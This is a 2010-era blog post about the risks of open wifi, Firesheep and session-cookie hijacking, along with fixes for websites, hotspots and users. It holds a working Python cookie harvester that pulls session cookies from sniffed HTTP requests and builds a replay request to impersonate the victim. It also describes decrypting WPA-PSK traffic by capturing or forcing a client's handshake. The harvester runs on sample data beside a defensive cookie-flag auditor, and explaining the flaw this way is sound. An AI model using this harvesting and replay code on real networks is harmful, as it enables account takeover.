More Open Wifi Problems

I've written before about how risky open wifi is. It has just become MUCH more risky. It used to be like driving blindfolded along a race track. Now it is like speeding blindfolded along the freeway. If you are using open wifi in places like Starbucks and using Facebook or Twitter or Flickr or any of about 30 other social networking type sites, then anyone on that wifi hotspot can get into your account and do whatever they want there just as easily as you can. They don't even need to be a hacker or have any special competence.

The Basic Problem

The main problem is that after you log in over a secure (HTTPS) page, most of those sites send you back to ordinary non-secure (HTTP) pages, and from then on your browser sends the session cookie they use to recognize you in the clear with every request. Anyone sniffing the wifi traffic can copy that cookie into their own browser and use the site exactly as if they were you. The session cookie will, in fact, identify them as you: the site never asks for a password again.
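Here is an added example of what a sniffer on an open network has to do to pull a session out of that traffic. It is my own code for this post, not Firesheep and not anything from Eric Butler; the captured requests, host names and cookie names are constructed for the example. The only site-specific knowledge it needs is which cookie carries the session for each host, which is exactly the per-site list a tool like Firesheep ships with.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: plain-HTTP requests exactly as they appear to anyone
# sniffing an open (unencrypted) wifi network. Hosts and cookie values are
# made up; the real sites named in this post use different cookie names.
CAPTURED_REQUESTS = [
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.example-social.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: sid=7f3a9c2e1b; lang=en\r\n"
    b"\r\n",
    b"GET /timeline HTTP/1.1\r\n"
    b"Host: www.example-micro.com\r\n"
    b"Cookie: auth_token=deadbeefcafe\r\n"
    b"\r\n",
    b"GET /static/logo.png HTTP/1.1\r\n"   # static asset, no cookie at all
    b"Host: cdn.example-micro.com\r\n"
    b"\r\n",
]

# Which cookie names identify the logged-in user on which host. This table
# is an assumption for the example; a real tool carries one entry per site.
SESSION_COOKIES = {
    "www.example-social.com": ["sid"],
    "www.example-micro.com": ["auth_token"],
}


def parse_request(raw: bytes) -> Optional[dict]:
    """Split a raw HTTP/1.x request into method, path and a lowercase header dict."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None  # not an HTTP request line; ignore the frame
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers}


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Parse a Cookie header value such as 'a=1; b=2' into a dict."""
    cookies = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep:
            cookies[name.strip()] = val.strip()
    return cookies


def harvest_sessions(captures: List[bytes]) -> Dict[str, Dict[str, str]]:
    """Return {host: {cookie_name: value}} for every session cookie seen in the clear."""
    sessions: Dict[str, Dict[str, str]] = {}
    for raw in captures:
        req = parse_request(raw)
        if req is None:
            continue
        host = req["headers"].get("host", "")
        if host not in SESSION_COOKIES or "cookie" not in req["headers"]:
            continue
        cookies = parse_cookie_header(req["headers"]["cookie"])
        found = {n: cookies[n] for n in SESSION_COOKIES[host] if n in cookies}
        if found:
            sessions.setdefault(host, {}).update(found)
    return sessions


def replay_request(host: str, path: str, session: Dict[str, str]) -> bytes:
    """Build the request the sniffer sends: same cookie, so the site treats them as the victim."""
    cookie = "; ".join(f"{n}={v}" for n, v in session.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


if __name__ == "__main__":
    for host, session in harvest_sessions(CAPTURED_REQUESTS).items():
        print(host, session)
        print(replay_request(host, "/", session).decode())
```

Note that nothing in the replay involves a password or any cryptography: the cookie is the credential, and the site handed it to the victim's browser over plain HTTP. The CDN request in the sample shows the other side of it, which is that a site leaks only where it sends the session cookie, so the fix is to stop sending it in the clear, not to stop serving static files.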

The Immediate Threat

This has always been a problem that anyone with packet-sniffing software could exploit. Computer security experts have long complained that the combination of open wifi and sites that don't keep the connection secure throughout their domain creates a big problem that could easily be corrected.

One of these experts did get angry enough to try to bring the problem to a head. Eric Butler of Seattle, Washington, wrote Firesheep, a Firefox extension that lets any ordinary user see everyone on the same hotspot who is logged into any of about 30 different social networking sites and do just about anything on their accounts. In the first two weeks after its release, over 700,000 people downloaded this software. His hope is to force these sites to clean up their act and make their whole sites SSL secure.

Eric writes, "Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win."

You may object to his solution. Using it against other people's sessions may well be illegal. But it is also, clearly, a game changer.

This add-on is so popular that there is already a new add-on called BlackSheep, designed to detect whether someone on your wifi hotspot is running Firesheep. Another, called SheepHerder, is designed to protect you. But protecting you from one single program, while continuing to act recklessly, is not the answer.

The Vendor's Solution

Vendors should make their whole sites SSL only, and they should mark their session cookies with the Secure flag so the browser never sends them over a plain HTTP connection, even if a user types http:// or follows an old link. They should not be broadcasting session cookies in the clear. Just like your bank and PayPal, sites should be locked down if they hold private information or if people's public persona can be altered.
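An added example of how to check a site for exactly these mistakes, written for this post rather than taken from any vendor. It audits two responses: what the server sends back after a successful HTTPS login (where it redirects you and how it sets the session cookie) and what it sends back to a plain http:// request to the same host. The sample responses and the cookie name are constructed; it goes a little beyond the post by also checking for the HttpOnly flag and for the Strict-Transport-Security header, which tells browsers that support it to use HTTPS for the whole site.

```python
from typing import Dict, List, Tuple

# Constructed sample responses. The "leaky" pair is a site that protects only
# its login page; the "hardened" pair is the same site done right.
LEAKY_LOGIN_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://www.example-social.com/home.php\r\n"
    "Set-Cookie: sid=7f3a9c2e1b; Path=/\r\n"
    "Set-Cookie: lang=en; Path=/\r\n"
    "\r\n"
)
LEAKY_HTTP_RESPONSE = (  # a plain http:// page, served as-is
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
HARDENED_LOGIN_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://www.example-social.com/home.php\r\n"
    "Set-Cookie: sid=7f3a9c2e1b; Path=/; Secure; HttpOnly\r\n"
    "Set-Cookie: lang=en; Path=/\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "\r\n"
)
HARDENED_HTTP_RESPONSE = (  # a plain http:// request answered with a redirect only
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://www.example-social.com/\r\n"
    "\r\n"
)

# Assumption for the example: which cookie names identify the logged-in user.
SESSION_COOKIE_NAMES = {"sid"}


def parse_response(raw: str) -> Tuple[int, List[Tuple[str, str]]]:
    """Return (status code, [(lowercased header name, value), ...]) for a raw HTTP/1.x response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return status, headers


def cookie_attributes(set_cookie: str) -> Tuple[str, Dict[str, str]]:
    """Split 'name=value; Attr; Attr=x' into (name, {lowercased attr: value})."""
    first, *rest = [p.strip() for p in set_cookie.split(";")]
    name = first.partition("=")[0].strip()
    attrs = {}
    for part in rest:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_login_response(raw: str) -> List[str]:
    """Findings for the response to a successful login over HTTPS."""
    findings = []
    _, headers = parse_response(raw)
    for name, value in headers:
        if name == "location" and value.lower().startswith("http://"):
            findings.append(f"redirects the logged-in user to plain HTTP: {value}")
        if name == "set-cookie":
            cname, attrs = cookie_attributes(value)
            if cname in SESSION_COOKIE_NAMES:
                if "secure" not in attrs:
                    findings.append(f"session cookie {cname!r} lacks Secure; the browser will send it over http://")
                if "httponly" not in attrs:
                    findings.append(f"session cookie {cname!r} lacks HttpOnly; page scripts can read it")
    if not any(n == "strict-transport-security" for n, _ in headers):
        findings.append("no Strict-Transport-Security header; browsers will still follow http:// links")
    return findings


def audit_http_response(raw: str) -> List[str]:
    """Findings for the response to a plain http:// request for the same host."""
    status, headers = parse_response(raw)
    location = dict(headers).get("location", "")
    if status not in (301, 302, 307, 308) or not location.lower().startswith("https://"):
        return [f"plain HTTP request answered with status {status} instead of a redirect to https://"]
    return []


if __name__ == "__main__":
    for label, login, plain in [
        ("leaky", LEAKY_LOGIN_RESPONSE, LEAKY_HTTP_RESPONSE),
        ("hardened", HARDENED_LOGIN_RESPONSE, HARDENED_HTTP_RESPONSE),
    ]:
        print(label, audit_login_response(login) + audit_http_response(plain))
```

The Secure flag is the single change that would have blinded Firesheep for a given site: with it, the cookie never rides on an http:// request, no matter where the site sends the user afterwards. The redirect check matters because a site that is "SSL only" but still answers on port 80 with real pages has not actually moved.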

The Hotspot's Solution

If the hotspots used WPA or WPA2 encryption instead of open wifi, Firesheep as it exists today would be blind. WPA gives each client its own pairwise key, so one laptop cannot simply read another laptop's frames the way it can on an open network, and even a simple password posted in plain sight gets you that much. So if Starbucks put up a sign saying, "We're using WPA encryption. The password is 'coffee'," then ordinary Firesheep users at that hotspot would see nothing. They could even add 'our password is coffee' to their SSID so people would see it when selecting the wifi hotspot.

The caveat is that a shared password does not make that separation airtight. Each client's key is derived from the password, the SSID, the two MAC addresses and two random nonces that are exchanged in the clear, so anyone who knows the password and captures a client's four-way handshake (or forces a new one by briefly knocking the client off the network) can compute that client's key and decrypt its traffic; wireless sniffers already do this when given the passphrase. A posted password raises the bar from "install a Firefox add-on" to "use a sniffer that supports WPA decryption"; it does not eliminate the problem, which is why sites still need to be SSL throughout.

Your Solution

Set up your own secure channel. If you use wifi hotspots, hotel networks, or airport online access to check email or do anything else, do so only through a secure channel, so that the hotspot carries nothing but encrypted traffic.

You can do this by using LogMeIn (or an equivalent like GoToMyPC) to log in securely to your desktop computer at home and then browse out from there; the only thing crossing the hotspot is the encrypted remote-control session. There is even a limited free version of LogMeIn. Of course, you could also log in to your corporate VPN and browse through your workstation if that is available.

Another option is to use a VPN service. I recommend Witopia's Personal SSL VPN service for $59.99/yr. This lets you set up a secure connection to any of their many VPN servers all over the world and send all of your Internet access through a fully encrypted SSL VPN, so it is easy to connect to one near your location. Keep in mind what the tunnel covers: your traffic is encrypted from your laptop to the VPN server, which is exactly the stretch the hotspot sniffer can see. From the VPN server onward it travels as it normally would, so a site that sends its cookies in the clear is still doing so past that point, just out of reach of the people sitting next to you.

If you have any questions or want help setting up LogMeIn or Witopia, just call.

Short Videos

A simple demonstration of Firesheep is here: www.youtube.com/watch?v=9T8xaDoYNmg&feature=fvw

An ABC news story on Firesheep: abclocal.go.com/wabc/video?id=7750382&rss=rss-wabc-video-7750382

Date: December 2010

